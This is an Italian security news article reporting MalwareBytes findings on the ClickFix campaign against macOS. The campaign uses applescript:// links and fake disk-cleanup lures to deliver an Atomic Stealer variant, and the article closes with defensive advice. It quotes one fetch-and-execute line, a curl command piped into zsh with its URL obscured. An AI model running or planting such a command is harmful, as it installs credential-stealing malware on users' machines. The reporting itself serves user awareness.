Scoperto nell’ecosistema Mac ClickFix, un malware che utilizza una variante evoluta del già noto virus Atomic Stealer, questa volta aggiornato per aggirare i protocolli di sicurezza introdotti con la versione 26.4 di macOS Tahoe.
Dal Terminal a Script Editor: il nuovo vettore di infezione
Particolarità di ClickFix è l’eliminazione del passaggio più sospetto per molti utenti: l’inserimento manuale di comandi nel Terminal. Secondo quanto riportato da MalwareBytes, al suo posto, la vittima viene invitata a cliccare un pulsante che simula un “Apple script” di manutenzione del sistema.
Attraverso il link applescript://, il sistema apre Script Editor con uno script precompilato. Questo script contiene una riga apparentemente innocua ma in realtà pericolosa: do shell script "curl -kSsfL <URL offuscato> | zsh". Il comando avvia il download di contenuti remoti che vengono poi eseguiti automaticamente, dando inizio a una catena di infezione multi-stadio.
La catena di infezione e il ruolo di Atomic Stealer
Il processo non si ferma al primo download. Lo script iniziale recupera ulteriori componenti che vengono decodificati progressivamente fino a scaricare e avviare un payload finale. In questo caso, il malware identificato è una variante di Atomic Stealer (AMOS), un infostealer noto per macOS.
Atomic Stealer è progettato per sottrarre informazioni sensibili dal dispositivo compromesso, ma secondo gli analisti rappresenta solo una delle possibili varianti utilizzate da ClickFix. La struttura modulare della campagna permette infatti di sostituire il payload con altre famiglie di malware in futuro, rendendo l’attacco estremamente flessibile e adattabile.
L’ingegneria sociale dietro la trappola “libera spazio sul Mac”
Uno degli elementi chiave del successo di ClickFix è la capacità di convincere l’utente ad agire volontariamente. La nuova campagna sfrutta temi familiari come “Recupera spazio su disco sul tuo Mac”, accompagnati da interfacce che simulano strumenti ufficiali di Apple.
In alcuni casi, il sistema mostra persino falsi messaggi di successo come “24,7 GB liberati”, rafforzando la percezione che l’operazione sia legittima. Questo approccio riduce le barriere psicologiche che normalmente renderebbero sospetto l’uso del Terminal, rendendo l’interazione più fluida e credibile.
Le contromisure e le raccomandazioni di sicurezza
Secondo MalwareBytes, ClickFix ha rappresentato una quota significativa delle attività legate ai malware loader nel 2025, proprio grazie alla continua evoluzione delle tecniche di inganno. Il cambiamento verso Script Editor dimostra la volontà degli attaccanti di adattarsi rapidamente alla maggiore consapevolezza degli utenti.
Per contrastare queste minacce, vengono indicate alcune misure fondamentali: rallentare le azioni quando si ricevono istruzioni online, evitare l’esecuzione di comandi o script da fonti non verificate e controllare sempre la legittimità delle istruzioni attraverso canali ufficiali. È inoltre consigliato limitare il copia-incolla di codice sconosciuto e mantenere attive soluzioni di sicurezza aggiornate con protezione web in tempo reale.
Sui sistemi macOS Tahoe aggiornati alla versione 26.4 o successive, è previsto anche un avviso specifico quando vengono rilevati script potenzialmente sospetti, aggiungendo un ulteriore livello di difesa contro questa tipologia di attacco.
